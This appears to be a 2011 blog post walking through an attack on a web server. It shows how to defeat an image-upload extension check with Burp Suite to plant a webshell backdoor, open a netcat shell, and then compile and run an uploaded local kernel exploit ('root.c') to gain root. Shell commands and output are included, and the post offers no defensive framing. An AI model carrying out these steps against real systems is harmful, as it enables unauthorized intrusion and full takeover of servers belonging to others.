Selasa, 19 Juli 2011

"Permission Denied" are you root??

Today I want to show you how to get root access trough web application flaws on the web server.
Once I have to find out the vulnerable of the web application for exploit..
target for today is 192.xxx.xx.101 /xxx. This web, support for vulnerable at the upload image feature. And it can be exploit by use temper data tool, like burpsuit/
before start upload setting your proxy on your browser to intercept the POST data from your browser client use burpsuit.
Now, this web application only can uploading an image or jpg extension, so I renamed my shell backdoor to be jpg extension then I click Upload. The file not exactly to POST to server but it can be edit with burpsuit tool. Like this


now delete the jpg extension then forward data.
if successfully uploaded, go to directory to see your webshell.
Picture :
 
that is a simple webshell backdoor but very useful for our attack.
On the webshell you can execute command, upload file and query database from the server..its nice job....!!! aren't

then I upload my currently greet webshell backdoor like this below :
 
now my mission i want to get root access from this server. but I have to exploit it..!!
once I try to execute command “uname -a” looking for kernel version ..

the result like this :
Linux soikrucil 2.6.17-10-generic #2 SMP Fri Oct 13 18:45:35 UTC 2006 i686 GNU/Linux

its so good,
then I upload my exploit on directory /tmp :
after successfully uploaded my exploit file, I try to remote it from my local machine use command 'nc' from my webshell backdoor its running the result like this :
root@bt:~# nc 192.168.56.101 13123
bash: no job control in this shell
nobody@soikrucil:/tmp$ ls
1978763868
bdp
kde-soikrucil
ksocket-soikrucil
pbms_temp_4397
root.c
sess_30af21f1809c4f764f653d8a97e45cad
sess_4582db1ed4c847edf7ff4dd0cdc09f91
ssh-rkWzUs4056
nobody@soikrucil:/tmp$

my exploit file have uploaded on this directory its name “root.c”
now I try to compile it use gcc compile and the result like this :
nobody@soikrucil:/tmp$ gcc -w root.c -o root
nobody@soikrucil:/tmp$ ls
1978763868
bdp
kde-soikrucil
ksocket-soikrucil
pbms_temp_4397
root
root.c
sess_30af21f1809c4f764f653d8a97e45cad
sess_4582db1ed4c847edf7ff4dd0cdc09f91
ssh-rkWzUs4056
nobody@soikrucil:/tmp$ ./root
bash: no job control in this shell
root@soikrucil:/tmp#

after finished compilation I try execute my exploit it running and now I get root access
use command 'su' for get full access.
thankss...

Tidak ada komentar:

Posting Komentar